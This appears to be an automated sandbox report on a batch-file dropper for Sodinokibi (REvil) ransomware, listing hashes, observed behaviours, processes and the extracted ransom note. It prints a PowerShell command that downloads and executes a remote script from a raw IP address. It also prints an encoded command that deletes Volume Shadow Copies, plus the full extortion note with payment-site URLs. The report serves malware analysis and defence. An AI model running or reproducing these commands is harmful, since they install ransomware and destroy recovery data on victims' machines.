Analysis

  • max time kernel
    108s
  • max time network
    108s
  • platform
    windows7_x64
  • resource
    win7v200410
  • submitted
    18-04-2020 15:10

General

  • Target

    u3CD1fs9.bat

  • Size

    192B

  • MD5

    775b9f9c687e640c4e5a65c9512ef573

  • SHA1

    920bb3ec6c979520acefcb233670b18446ed09e9

  • SHA256

    97b4b68e56ffee83aa062e9f016df1f5c2e280b6df581deec97ced89667e8d1b

  • SHA512

    e41e431075bf6869cfa5b1e90c267545f30bf7548fb91e7d729292b2a20b376553807ff45970250bf53e568cdc894e4482c77e82b98ac8c84403cd31d73b2a69

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/u3CD1fs9

Extracted

Path

C:\a55i656bw-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension a55i656bw. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/86A547CCAB237928 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/86A547CCAB237928 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: b9Jrgy6k72wsyUSWQajDRv95+Kifw9CCN1zCK3l8sdMv+unXJJfJreQAS5cwuE9U X/jXkIDtgzG3hgCAGSRGd1mo0Kr8JBQrHhoLRzWiiPQ/ea+MfaBVCGGh6MGM1b3L FpzVaTYNE2uKI8+0+l6w8YlVP2hyqob/d08V/4P4YkpwO+6ma5R+ccW6CgABvJDk G3o0WNoEMwEcKMBq26vsiLi1N5QLVM0hc/pmUW3yjER3gkhqnKqjMWekTXHaO5xi ecDQyjzHq9Zk2cbc3WQgX73GSeGmpN7YV8jqMGqCH6Df+J3wuSExie0JrvZXKSm1 QdCpsYHawL4MqrCHfxloX/P+mN3M/Wo+vZVeFmauPOG8ljO0sO8YSiAHb1ysRj0n RTPy8vBuEKycWbCsG4jMJxRia7AVW5LFCk4ti02v7f+YZ6AuFQyINvicLcIh87o8 Bho8Y3CSC9RFPaYbaZxab0ngH9YwGyYSr1ibQSpKAu0yFcg+Hx9S/QAhJvrqgG+s 78RS+RG6wBbj6tQJU6fiToNtPrz+9CXiVSrELFx3nP2lwa9irOFCjbvJcEdhPo2J TTHPfLMzK94bfM+EafWriIb1DJLZZyZLC0R4zgSBAsnSRrcWaCw/ocdAoZr6yVwV 0hxprB67EBMJQxIkGHaUR+Na+fYMkFDB1K29PDvaGcICQwY4QN9FZK/34BNdWoJK ezJT7wkBvM5dHFAjAJ9tcTjbbLHQl+Pc+TYqBc3wdz8oUSzdfKZ7iNBTWsquUpU0 g9z5Y1gFrLAaCyM1+xQAk7qmxrCQwpktSQL+hqIZrWnc6RuBDQGOWXiYiHRR9zOr QpPbD2nP+iW8OVg00SWG2zTotyamPsGMYBgvocLwE1i0LOeWogliQXlH9Z/2dwTv 76fK6QzhM7w+NTl4TPU+VxYwlV81eKmpVHPYR5aQsZPN50nyuOL3Dofe3i5LGa/x lKqhigG+4T/8laVm9XTtEmIFiE4t7d3S3wjrc6Xd8RVqkV+2ZLK4BjaxjvvahWbj H/sTI6RmV1zuamc0JqahF/u9+ETVkguXj6dxEiEAAwyeKs1peJLiePjPhlLz+JD4 ufqeFyYe+flilzvS2HS9uwrCG/Gz3YVB/NNwQpit1KRVMSZLD3jsK7KyedpNJXa/ wovhXahH5/4d9l5TAoPxpZuh6y6v8JMvLrQDpJ1lDrHpkw1w9wMGOQyK2sWcx8lG IHUTFRS2ZU4FIoIJ7yj5s2x2HEk+W4mrJX588oe45GCkENkRH3a52xpq+iLosrjg EiLrnmSqMEYnfSohWwSFLZYtDt48FNFqafEHDDHPxeLFRoAjoo0= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/86A547CCAB237928

http://decryptor.cc/86A547CCAB237928

Signatures

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Makes http(s) request 1 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Drops file in Program Files directory 16 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Blacklisted process makes network request 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\u3CD1fs9.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1684
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/u3CD1fs9');Invoke-BJZXVCQKO;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Blacklisted process makes network request
      PID:1692
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1792
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1508

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_05471756-4b9c-45e9-8ddd-05fab605d637

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_20b90e15-f237-499e-a823-6772568bf000

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_37386d62-281a-4a91-a575-6755e45f3238

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5028523d-10aa-4674-b3d1-9db9e7b9fbf6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a24b3c29-8785-47a4-90c7-9951cb5bf055

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b3feaac6-0199-4ad4-87ff-a4b7cbd02223

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms